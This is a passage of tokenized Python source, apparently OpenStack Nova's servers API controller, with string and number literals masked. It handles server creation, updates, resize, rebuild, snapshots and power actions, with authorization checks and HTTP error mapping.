instance_uuid , <EOL> expected_attrs = expected_attrs ) <EOL> req . cache_db_instance ( instance ) <EOL> return instance <EOL> def _get_requested_networks ( self , requested_networks ) : <EOL> """<STR_LIT>""" <EOL> networks = [ ] <EOL> network_uuids = [ ] <EOL> for network in requested_networks : <EOL> request = objects . NetworkRequest ( ) <EOL> try : <EOL> request . address = network . get ( '<STR_LIT>' , None ) <EOL> request . port_id = network . get ( '<STR_LIT:port>' , None ) <EOL> if request . port_id : <EOL> request . network_id = None <EOL> if not utils . is_neutron ( ) : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> if request . address is not None : <EOL> msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) % { <EOL> "<STR_LIT>" : request . address , <EOL> "<STR_LIT:port>" : request . port_id } <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> else : <EOL> request . network_id = network [ '<STR_LIT>' ] <EOL> if ( not request . port_id and <EOL> not uuidutils . is_uuid_like ( request . network_id ) ) : <EOL> br_uuid = request . network_id . split ( '<STR_LIT:->' , <NUM_LIT:1> ) [ - <NUM_LIT:1> ] <EOL> if not uuidutils . is_uuid_like ( br_uuid ) : <EOL> msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) % request . network_id <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> if ( not utils . is_neutron ( ) and request . network_id and <EOL> request . network_id in network_uuids ) : <EOL> expl = ( _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % <EOL> request . network_id ) <EOL> raise exc . HTTPBadRequest ( explanation = expl ) <EOL> network_uuids . append ( request . network_id ) <EOL> networks . append ( request ) <EOL> except KeyError as key : <EOL> expl = _ ( '<STR_LIT>' ) % key <EOL> raise exc . HTTPBadRequest ( explanation = expl ) <EOL> except TypeError : <EOL> expl = _ ( '<STR_LIT>' ) <EOL> raise exc . HTTPBadRequest ( explanation = expl ) <EOL> return objects . NetworkRequestList ( objects = networks ) <EOL> B64_REGEX = re . compile ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def _decode_base64 ( self , data ) : <EOL> data = re . sub ( r'<STR_LIT>' , '<STR_LIT>' , data ) <EOL> if not self . B64_REGEX . match ( data ) : <EOL> return None <EOL> try : <EOL> return base64 . b64decode ( data ) <EOL> except TypeError : <EOL> return None <EOL> @ extensions . expected_errors ( <NUM_LIT> ) <EOL> def show ( self , req , id ) : <EOL> """<STR_LIT>""" <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> authorize ( context , action = "<STR_LIT>" ) <EOL> instance = self . _get_server ( context , req , id , is_detail = True ) <EOL> return self . _view_builder . show ( req , instance ) <EOL> @ wsgi . response ( <NUM_LIT> ) <EOL> @ extensions . expected_errors ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> @ validation . schema ( schema_server_create_v20 , '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ validation . schema ( schema_server_create , '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ validation . schema ( schema_server_create_v219 , '<STR_LIT>' ) <EOL> def create ( self , req , body ) : <EOL> """<STR_LIT>""" <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> server_dict = body [ '<STR_LIT>' ] <EOL> password = self . _get_server_admin_password ( server_dict ) <EOL> name = common . normalize_name ( server_dict [ '<STR_LIT:name>' ] ) <EOL> if api_version_request . is_supported ( req , min_version = '<STR_LIT>' ) : <EOL> if '<STR_LIT:description>' in server_dict : <EOL> description = server_dict [ '<STR_LIT:description>' ] <EOL> else : <EOL> description = None <EOL> else : <EOL> description = name <EOL> create_kwargs = { } <EOL> if list ( self . create_extension_manager ) : <EOL> self . create_extension_manager . map ( self . _create_extension_point , <EOL> server_dict , create_kwargs , body ) <EOL> availability_zone = create_kwargs . pop ( "<STR_LIT>" , None ) <EOL> target = { <EOL> '<STR_LIT>' : context . project_id , <EOL> '<STR_LIT>' : context . user_id , <EOL> '<STR_LIT>' : availability_zone } <EOL> authorize ( context , target , '<STR_LIT>' ) <EOL> parse_az = self . compute_api . parse_availability_zone <EOL> availability_zone , host , node = parse_az ( context , availability_zone ) <EOL> if host or node : <EOL> authorize ( context , { } , '<STR_LIT>' ) <EOL> block_device_mapping = create_kwargs . get ( "<STR_LIT>" ) <EOL> if block_device_mapping : <EOL> authorize ( context , target , '<STR_LIT>' ) <EOL> image_uuid = self . _image_from_req_data ( server_dict , create_kwargs ) <EOL> return_reservation_id = create_kwargs . pop ( '<STR_LIT>' , <EOL> False ) <EOL> requested_networks = None <EOL> if ( '<STR_LIT>' in self . extension_info . get_extensions ( ) <EOL> or utils . is_neutron ( ) ) : <EOL> requested_networks = server_dict . get ( '<STR_LIT>' ) <EOL> if requested_networks is not None : <EOL> requested_networks = self . _get_requested_networks ( <EOL> requested_networks ) <EOL> if requested_networks and len ( requested_networks ) : <EOL> authorize ( context , target , '<STR_LIT>' ) <EOL> try : <EOL> flavor_id = self . _flavor_id_from_req_data ( body ) <EOL> except ValueError : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> try : <EOL> inst_type = flavors . get_flavor_by_flavor_id ( <EOL> flavor_id , ctxt = context , read_deleted = "<STR_LIT>" ) <EOL> ( instances , resv_id ) = self . compute_api . create ( context , <EOL> inst_type , <EOL> image_uuid , <EOL> display_name = name , <EOL> display_description = description , <EOL> availability_zone = availability_zone , <EOL> forced_host = host , forced_node = node , <EOL> metadata = server_dict . get ( '<STR_LIT>' , { } ) , <EOL> admin_password = password , <EOL> requested_networks = requested_networks , <EOL> check_server_group_quota = True , <EOL> ** create_kwargs ) <EOL> except ( exception . QuotaError , <EOL> exception . PortLimitExceeded ) as error : <EOL> raise exc . HTTPForbidden ( <EOL> explanation = error . format_message ( ) ) <EOL> except exception . ImageNotFound : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> except exception . FlavorNotFound : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> except exception . KeypairNotFound : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> except exception . ConfigDriveInvalidValue : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> except exception . ExternalNetworkAttachForbidden as error : <EOL> raise exc . HTTPForbidden ( explanation = error . format_message ( ) ) <EOL> except messaging . RemoteError as err : <EOL> msg = "<STR_LIT>" % { '<STR_LIT>' : err . exc_type , <EOL> '<STR_LIT>' : err . value } <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> except UnicodeDecodeError as error : <EOL> msg = "<STR_LIT>" % error <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> except ( exception . ImageNotActive , <EOL> exception . ImageBadRequest , <EOL> exception . FixedIpNotFoundForAddress , <EOL> exception . FlavorDiskTooSmall , <EOL> exception . FlavorMemoryTooSmall , <EOL> exception . InvalidMetadata , <EOL> exception . InvalidRequest , <EOL> exception . InvalidVolume , <EOL> exception . MultiplePortsNotApplicable , <EOL> exception . InvalidFixedIpAndMaxCountRequest , <EOL> exception . InstanceUserDataMalformed , <EOL> exception . InstanceUserDataTooLarge , <EOL> exception . PortNotFound , <EOL> exception . FixedIpAlreadyInUse , <EOL> exception . SecurityGroupNotFound , <EOL> exception . PortRequiresFixedIP , <EOL> exception . NetworkRequiresSubnet , <EOL> exception . NetworkNotFound , <EOL> exception . NetworkDuplicated , <EOL> exception . InvalidBDM , <EOL> exception . InvalidBDMSnapshot , <EOL> exception . InvalidBDMVolume , <EOL> exception . InvalidBDMImage , <EOL> exception . InvalidBDMBootSequence , <EOL> exception . InvalidBDMLocalsLimit , <EOL> exception . InvalidBDMVolumeNotBootable , <EOL> exception . InvalidBDMEphemeralSize , <EOL> exception . InvalidBDMFormat , <EOL> exception . InvalidBDMSwapSize , <EOL> exception . AutoDiskConfigDisabledByImage , <EOL> exception . ImageNUMATopologyIncomplete , <EOL> exception . ImageNUMATopologyForbidden , <EOL> exception . ImageNUMATopologyAsymmetric , <EOL> exception . ImageNUMATopologyCPUOutOfRange , <EOL> exception . ImageNUMATopologyCPUDuplicates , <EOL> exception . ImageNUMATopologyCPUsUnassigned , <EOL> exception . ImageNUMATopologyMemoryOutOfRange , <EOL> exception . InstanceGroupNotFound ) as error : <EOL> raise exc . HTTPBadRequest ( explanation = error . format_message ( ) ) <EOL> except ( exception . PortInUse , <EOL> exception . InstanceExists , <EOL> exception . NetworkAmbiguous , <EOL> exception . NoUniqueMatch ) as error : <EOL> raise exc . HTTPConflict ( explanation = error . format_message ( ) ) <EOL> if return_reservation_id : <EOL> return wsgi . ResponseObject ( { '<STR_LIT>' : resv_id } ) <EOL> req . cache_db_instances ( instances ) <EOL> server = self . _view_builder . create ( req , instances [ <NUM_LIT:0> ] ) <EOL> if CONF . enable_instance_password : <EOL> server [ '<STR_LIT>' ] [ '<STR_LIT>' ] = password <EOL> robj = wsgi . ResponseObject ( server ) <EOL> return self . _add_location ( robj ) <EOL> def _create_extension_point ( self , ext , server_dict , <EOL> create_kwargs , req_body ) : <EOL> handler = ext . obj <EOL> LOG . debug ( "<STR_LIT>" , ext . obj ) <EOL> handler . server_create ( server_dict , create_kwargs , req_body ) <EOL> def _rebuild_extension_point ( self , ext , rebuild_dict , rebuild_kwargs ) : <EOL> handler = ext . obj <EOL> LOG . debug ( "<STR_LIT>" , ext . obj ) <EOL> handler . server_rebuild ( rebuild_dict , rebuild_kwargs ) <EOL> def _resize_extension_point ( self , ext , resize_dict , resize_kwargs ) : <EOL> handler = ext . obj <EOL> LOG . debug ( "<STR_LIT>" , ext . obj ) <EOL> handler . server_resize ( resize_dict , resize_kwargs ) <EOL> def _update_extension_point ( self , ext , update_dict , update_kwargs ) : <EOL> handler = ext . obj <EOL> LOG . debug ( "<STR_LIT>" , ext . obj ) <EOL> handler . server_update ( update_dict , update_kwargs ) <EOL> def _create_extension_schema ( self , ext , create_schema , version ) : <EOL> handler = ext . obj <EOL> LOG . debug ( "<STR_LIT>" , ext . obj ) <EOL> schema = handler . get_server_create_schema ( version ) <EOL> if ext . obj . name == '<STR_LIT>' : <EOL> create_schema [ '<STR_LIT>' ] . update ( schema ) <EOL> else : <EOL> create_schema [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] . update ( schema ) <EOL> def _update_extension_schema ( self , ext , update_schema , version ) : <EOL> handler = ext . obj <EOL> LOG . debug ( "<STR_LIT>" , ext . obj ) <EOL> schema = handler . get_server_update_schema ( version ) <EOL> update_schema [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] . update ( schema ) <EOL> def _rebuild_extension_schema ( self , ext , rebuild_schema , version ) : <EOL> handler = ext . obj <EOL> LOG . debug ( "<STR_LIT>" , ext . obj ) <EOL> schema = handler . get_server_rebuild_schema ( version ) <EOL> rebuild_schema [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] . update ( schema ) <EOL> def _resize_extension_schema ( self , ext , resize_schema , version ) : <EOL> handler = ext . obj <EOL> LOG . debug ( "<STR_LIT>" , ext . obj ) <EOL> schema = handler . get_server_resize_schema ( version ) <EOL> resize_schema [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] . update ( schema ) <EOL> def _delete ( self , context , req , instance_uuid ) : <EOL> authorize ( context , action = '<STR_LIT>' ) <EOL> instance = self . _get_server ( context , req , instance_uuid ) <EOL> if CONF . reclaim_instance_interval : <EOL> try : <EOL> self . compute_api . soft_delete ( context , instance ) <EOL> except exception . InstanceInvalidState : <EOL> self . compute_api . delete ( context , instance ) <EOL> else : <EOL> self . compute_api . delete ( context , instance ) <EOL> @ extensions . expected_errors ( ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> @ validation . schema ( schema_server_update_v20 , '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ validation . schema ( schema_server_update , '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ validation . schema ( schema_server_update_v219 , '<STR_LIT>' ) <EOL> def update ( self , req , id , body ) : <EOL> """<STR_LIT>""" <EOL> ctxt = req . environ [ '<STR_LIT>' ] <EOL> update_dict = { } <EOL> authorize ( ctxt , action = '<STR_LIT>' ) <EOL> if '<STR_LIT:name>' in body [ '<STR_LIT>' ] : <EOL> update_dict [ '<STR_LIT>' ] = common . normalize_name ( <EOL> body [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] ) <EOL> if '<STR_LIT:description>' in body [ '<STR_LIT>' ] : <EOL> update_dict [ '<STR_LIT>' ] = body [ '<STR_LIT>' ] [ '<STR_LIT:description>' ] <EOL> if list ( self . update_extension_manager ) : <EOL> self . update_extension_manager . map ( self . _update_extension_point , <EOL> body [ '<STR_LIT>' ] , update_dict ) <EOL> instance = self . _get_server ( ctxt , req , id , is_detail = True ) <EOL> try : <EOL> instance . update ( update_dict ) <EOL> instance . save ( ) <EOL> return self . _view_builder . show ( req , instance , <EOL> extend_address = False ) <EOL> except exception . InstanceNotFound : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPNotFound ( explanation = msg ) <EOL> @ wsgi . response ( <NUM_LIT> ) <EOL> @ extensions . expected_errors ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> @ wsgi . action ( '<STR_LIT>' ) <EOL> def _action_confirm_resize ( self , req , id , body ) : <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> authorize ( context , action = '<STR_LIT>' ) <EOL> instance = self . _get_server ( context , req , id ) <EOL> try : <EOL> self . compute_api . confirm_resize ( context , instance ) <EOL> except exception . InstanceUnknownCell as e : <EOL> raise exc . HTTPNotFound ( explanation = e . format_message ( ) ) <EOL> except exception . MigrationNotFound : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> except exception . InstanceIsLocked as e : <EOL> raise exc . HTTPConflict ( explanation = e . format_message ( ) ) <EOL> except exception . InstanceInvalidState as state_error : <EOL> common . raise_http_conflict_for_instance_invalid_state ( state_error , <EOL> '<STR_LIT>' , id ) <EOL> @ wsgi . response ( <NUM_LIT> ) <EOL> @ extensions . expected_errors ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> @ wsgi . action ( '<STR_LIT>' ) <EOL> def _action_revert_resize ( self , req , id , body ) : <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> authorize ( context , action = '<STR_LIT>' ) <EOL> instance = self . _get_server ( context , req , id ) <EOL> try : <EOL> self . compute_api . revert_resize ( context , instance ) <EOL> except exception . InstanceUnknownCell as e : <EOL> raise exc . HTTPNotFound ( explanation = e . format_message ( ) ) <EOL> except exception . MigrationNotFound : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> except exception . FlavorNotFound : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> except exception . InstanceIsLocked as e : <EOL> raise exc . HTTPConflict ( explanation = e . format_message ( ) ) <EOL> except exception . InstanceInvalidState as state_error : <EOL> common . raise_http_conflict_for_instance_invalid_state ( state_error , <EOL> '<STR_LIT>' , id ) <EOL> @ wsgi . response ( <NUM_LIT> ) <EOL> @ extensions . expected_errors ( ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> @ wsgi . action ( '<STR_LIT>' ) <EOL> @ validation . schema ( schema_servers . reboot ) <EOL> def _action_reboot ( self , req , id , body ) : <EOL> reboot_type = body [ '<STR_LIT>' ] [ '<STR_LIT:type>' ] . upper ( ) <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> authorize ( context , action = '<STR_LIT>' ) <EOL> instance = self . _get_server ( context , req , id ) <EOL> try : <EOL> self . compute_api . reboot ( context , instance , reboot_type ) <EOL> except exception . InstanceIsLocked as e : <EOL> raise exc . HTTPConflict ( explanation = e . format_message ( ) ) <EOL> except exception . InstanceInvalidState as state_error : <EOL> common . raise_http_conflict_for_instance_invalid_state ( state_error , <EOL> '<STR_LIT>' , id ) <EOL> def _resize ( self , req , instance_id , flavor_id , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> context = req . environ [ "<STR_LIT>" ] <EOL> authorize ( context , action = '<STR_LIT>' ) <EOL> instance = self . _get_server ( context , req , instance_id ) <EOL> try : <EOL> self . compute_api . resize ( context , instance , flavor_id , ** kwargs ) <EOL> except exception . InstanceUnknownCell as e : <EOL> raise exc . HTTPNotFound ( explanation = e . format_message ( ) ) <EOL> except exception . QuotaError as error : <EOL> raise exc . HTTPForbidden ( <EOL> explanation = error . format_message ( ) ) <EOL> except exception . InstanceIsLocked as e : <EOL> raise exc . HTTPConflict ( explanation = e . format_message ( ) ) <EOL> except exception . InstanceInvalidState as state_error : <EOL> common . raise_http_conflict_for_instance_invalid_state ( state_error , <EOL> '<STR_LIT>' , instance_id ) <EOL> except exception . ImageNotAuthorized : <EOL> msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> raise exc . HTTPUnauthorized ( explanation = msg ) <EOL> except exception . ImageNotFound : <EOL> msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> except ( exception . AutoDiskConfigDisabledByImage , <EOL> exception . CannotResizeDisk , <EOL> exception . CannotResizeToSameFlavor , <EOL> exception . FlavorNotFound , <EOL> exception . NoValidHost ) as e : <EOL> raise exc . HTTPBadRequest ( explanation = e . format_message ( ) ) <EOL> except exception . Invalid : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> @ wsgi . response ( <NUM_LIT> ) <EOL> @ extensions . expected_errors ( ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> def delete ( self , req , id ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self . _delete ( req . environ [ '<STR_LIT>' ] , req , id ) <EOL> except exception . InstanceNotFound : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPNotFound ( explanation = msg ) <EOL> except exception . InstanceUnknownCell as e : <EOL> raise exc . HTTPNotFound ( explanation = e . format_message ( ) ) <EOL> except exception . InstanceIsLocked as e : <EOL> raise exc . HTTPConflict ( explanation = e . format_message ( ) ) <EOL> except exception . InstanceInvalidState as state_error : <EOL> common . raise_http_conflict_for_instance_invalid_state ( state_error , <EOL> '<STR_LIT>' , id ) <EOL> def _image_uuid_from_href ( self , image_href ) : <EOL> image_uuid = image_href . split ( '<STR_LIT:/>' ) . pop ( ) <EOL> if not uuidutils . is_uuid_like ( image_uuid ) : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> return image_uuid <EOL> def _image_from_req_data ( self , server_dict , create_kwargs ) : <EOL> """<STR_LIT>""" <EOL> image_href = server_dict . get ( '<STR_LIT>' ) <EOL> if not image_href and create_kwargs . get ( '<STR_LIT>' ) : <EOL> return '<STR_LIT>' <EOL> elif image_href : <EOL> return self . _image_uuid_from_href ( six . text_type ( image_href ) ) <EOL> else : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> def _flavor_id_from_req_data ( self , data ) : <EOL> flavor_ref = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> return common . get_id_from_href ( flavor_ref ) <EOL> @ wsgi . response ( <NUM_LIT> ) <EOL> @ extensions . expected_errors ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> @ wsgi . action ( '<STR_LIT>' ) <EOL> @ validation . schema ( schema_server_resize ) <EOL> def _action_resize ( self , req , id , body ) : <EOL> """<STR_LIT>""" <EOL> resize_dict = body [ '<STR_LIT>' ] <EOL> flavor_ref = str ( resize_dict [ "<STR_LIT>" ] ) <EOL> resize_kwargs = { } <EOL> if list ( self . resize_extension_manager ) : <EOL> self . resize_extension_manager . map ( self . _resize_extension_point , <EOL> resize_dict , resize_kwargs ) <EOL> self . _resize ( req , id , flavor_ref , ** resize_kwargs ) <EOL> @ wsgi . response ( <NUM_LIT> ) <EOL> @ extensions . expected_errors ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> @ wsgi . action ( '<STR_LIT>' ) <EOL> @ validation . schema ( schema_server_rebuild_v20 , '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ validation . schema ( schema_server_rebuild , '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ validation . schema ( schema_server_rebuild_v219 , '<STR_LIT>' ) <EOL> def _action_rebuild ( self , req , id , body ) : <EOL> """<STR_LIT>""" <EOL> rebuild_dict = body [ '<STR_LIT>' ] <EOL> image_href = rebuild_dict [ "<STR_LIT>" ] <EOL> image_href = self . _image_uuid_from_href ( image_href ) <EOL> password = self . _get_server_admin_password ( rebuild_dict ) <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> authorize ( context , action = '<STR_LIT>' ) <EOL> instance = self . _get_server ( context , req , id ) <EOL> attr_map = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> rebuild_kwargs = { } <EOL> if list ( self . rebuild_extension_manager ) : <EOL> self . rebuild_extension_manager . map ( self . _rebuild_extension_point , <EOL> rebuild_dict , rebuild_kwargs ) <EOL> for request_attribute , instance_attribute in attr_map . items ( ) : <EOL> try : <EOL> if request_attribute == '<STR_LIT:name>' : <EOL> rebuild_kwargs [ instance_attribute ] = common . normalize_name ( <EOL> rebuild_dict [ request_attribute ] ) <EOL> else : <EOL> rebuild_kwargs [ instance_attribute ] = rebuild_dict [ <EOL> request_attribute ] <EOL> except ( KeyError , TypeError ) : <EOL> pass <EOL> try : <EOL> self . compute_api . rebuild ( context , <EOL> instance , <EOL> image_href , <EOL> password , <EOL> ** rebuild_kwargs ) <EOL> except exception . InstanceIsLocked as e : <EOL> raise exc . HTTPConflict ( explanation = e . format_message ( ) ) <EOL> except exception . InstanceInvalidState as state_error : <EOL> common . raise_http_conflict_for_instance_invalid_state ( state_error , <EOL> '<STR_LIT>' , id ) <EOL> except exception . InstanceNotFound : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPNotFound ( explanation = msg ) <EOL> except exception . InstanceUnknownCell as e : <EOL> raise exc . HTTPNotFound ( explanation = e . format_message ( ) ) <EOL> except exception . ImageNotFound : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise exc . HTTPBadRequest ( explanation = msg ) <EOL> except exception . QuotaError as error : <EOL> raise exc . HTTPForbidden ( explanation = error . format_message ( ) ) <EOL> except ( exception . ImageNotActive , <EOL> exception . FlavorDiskTooSmall , <EOL> exception . FlavorMemoryTooSmall , <EOL> exception . InvalidMetadata , <EOL> exception . AutoDiskConfigDisabledByImage ) as error : <EOL> raise exc . HTTPBadRequest ( explanation = error . format_message ( ) ) <EOL> instance = self . _get_server ( context , req , id , is_detail = True ) <EOL> view = self . _view_builder . show ( req , instance , extend_address = False ) <EOL> if CONF . enable_instance_password : <EOL> view [ '<STR_LIT>' ] [ '<STR_LIT>' ] = password <EOL> robj = wsgi . ResponseObject ( view ) <EOL> return self . _add_location ( robj ) <EOL> @ wsgi . response ( <NUM_LIT> ) <EOL> @ extensions . expected_errors ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> @ wsgi . action ( '<STR_LIT>' ) <EOL> @ common . check_snapshots_enabled <EOL> @ validation . schema ( schema_servers . create_image , '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ validation . schema ( schema_servers . create_image , '<STR_LIT>' ) <EOL> def _action_create_image ( self , req , id , body ) : <EOL> """<STR_LIT>""" <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> authorize ( context , action = '<STR_LIT>' ) <EOL> entity = body [ "<STR_LIT>" ] <EOL> image_name = common . normalize_name ( entity [ "<STR_LIT:name>" ] ) <EOL> metadata = entity . get ( '<STR_LIT>' , { } ) <EOL> common . check_img_metadata_properties_quota ( context , metadata ) <EOL> instance = self . _get_server ( context , req , id ) <EOL> bdms = objects . BlockDeviceMappingList . get_by_instance_uuid ( <EOL> context , instance . uuid ) <EOL> try : <EOL> if self . compute_api . is_volume_backed_instance ( context , instance , <EOL> bdms ) : <EOL> authorize ( context , action = "<STR_LIT>" ) <EOL> image = self . compute_api . snapshot_volume_backed ( <EOL> context , <EOL> instance , <EOL> image_name , <EOL> extra_properties = <EOL> metadata ) <EOL> else : <EOL> image = self . compute_api . snapshot ( context , <EOL> instance , <EOL> image_name , <EOL> extra_properties = metadata ) <EOL> except exception . InstanceUnknownCell as e : <EOL> raise exc . HTTPNotFound ( explanation = e . format_message ( ) ) <EOL> except exception . InstanceInvalidState as state_error : <EOL> common . raise_http_conflict_for_instance_invalid_state ( state_error , <EOL> '<STR_LIT>' , id ) <EOL> except exception . Invalid as err : <EOL> raise exc . HTTPBadRequest ( explanation = err . format_message ( ) ) <EOL> image_id = str ( image [ '<STR_LIT:id>' ] ) <EOL> image_ref = glance . generate_image_url ( image_id ) <EOL> resp = webob . Response ( status_int = <NUM_LIT> ) <EOL> resp . headers [ '<STR_LIT>' ] = image_ref <EOL> return resp <EOL> def _get_server_admin_password ( self , server ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> password = server [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> password = utils . generate_password ( ) <EOL> return password <EOL> def _get_server_search_options ( self , req ) : <EOL> """<STR_LIT>""" <EOL> opt_list = ( '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT:status>' , '<STR_LIT:image>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if api_version_request . is_supported ( req , min_version = '<STR_LIT>' ) : <EOL> opt_list += ( '<STR_LIT>' , ) <EOL> return opt_list <EOL> def _get_instance ( self , context , instance_uuid ) : <EOL> try : <EOL> attrs = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> return objects . Instance . get_by_uuid ( context , instance_uuid , <EOL> expected_attrs = attrs ) <EOL> except exception . InstanceNotFound as e : <EOL> raise webob . exc . HTTPNotFound ( explanation = e . format_message ( ) ) <EOL> @ wsgi . response ( <NUM_LIT> ) <EOL> @ extensions . expected_errors ( ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> @ wsgi . action ( '<STR_LIT>' ) <EOL> def _start_server ( self , req , id , body ) : <EOL> """<STR_LIT>""" <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> instance = self . _get_instance ( context , id ) <EOL> authorize ( context , instance , '<STR_LIT:start>' ) <EOL> LOG . debug ( '<STR_LIT>' , instance = instance ) <EOL> try : <EOL> self . compute_api . start ( context , instance ) <EOL> except ( exception . InstanceNotReady , exception . InstanceIsLocked ) as e : <EOL> raise webob . exc . HTTPConflict ( explanation = e . format_message ( ) ) <EOL> except exception . InstanceUnknownCell as e : <EOL> raise exc . HTTPNotFound ( explanation = e . format_message ( ) ) <EOL> except exception . InstanceInvalidState as state_error : <EOL> common . raise_http_conflict_for_instance_invalid_state ( state_error , <EOL> '<STR_LIT:start>' , id ) <EOL> @ wsgi . response ( <NUM_LIT> ) <EOL> @ extensions . expected_errors ( ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> @ wsgi . action ( '<STR_LIT>' ) <EOL> def _stop_server ( self , req , id , body ) : <EOL> """<STR_LIT>""" <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> instance = self . _get_instance ( context , id ) <EOL> authorize ( context , instance , '<STR_LIT>' ) <EOL> LOG . debug ( '<STR_LIT>' , instance = instance ) <EOL> try : <EOL> self . compute_api . stop ( context , instance ) <EOL> except ( exception . InstanceNotReady , exception . InstanceIsLocked ) as e : <EOL> raise webob . exc . HTTPConflict ( explanation = e . format_message ( ) ) <EOL> except exception . InstanceUnknownCell as e : <EOL> raise exc . HTTPNotFound ( explanation = e . format_message ( ) ) <EOL> except exception . InstanceInvalidState as state_error : <EOL> common . raise_http_conflict_for_instance_invalid_state ( state_error , <EOL> '<STR_LIT>' , id ) <EOL> @ wsgi . Controller . api_version ( "<STR_LIT>" ) <EOL> @ wsgi . response ( <NUM_LIT> ) <EOL> @ extensions . expected_errors ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> @ wsgi . action ( '<STR_LIT>' ) <EOL> @ validation . schema ( schema_servers . trigger_crash_dump ) <EOL> def _action_trigger_crash_dump ( self , req , id , body ) : <EOL> """<STR_LIT>""" <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> instance = self . _get_instance ( context , id ) <EOL> authorize ( context , instance , '<STR_LIT>' ) <EOL> try : <EOL> self . compute_api . trigger_crash_dump ( context , instance ) <EOL> except exception . InstanceInvalidState as state_error : <EOL> common . raise_http_conflict_for_instance_invalid_state ( state_error , <EOL> '<STR_LIT>' , id ) <EOL> except ( exception . InstanceNotReady , exception . InstanceIsLocked ) as e : <EOL> raise webob . exc . HTTPConflict ( explanation = e . format_message ( ) ) <EOL> except exception . TriggerCrashDumpNotSupported as e : <EOL> raise webob . exc . HTTPBadRequest ( explanation = e . format_message ( ) ) <EOL> def remove_invalid_options ( context , 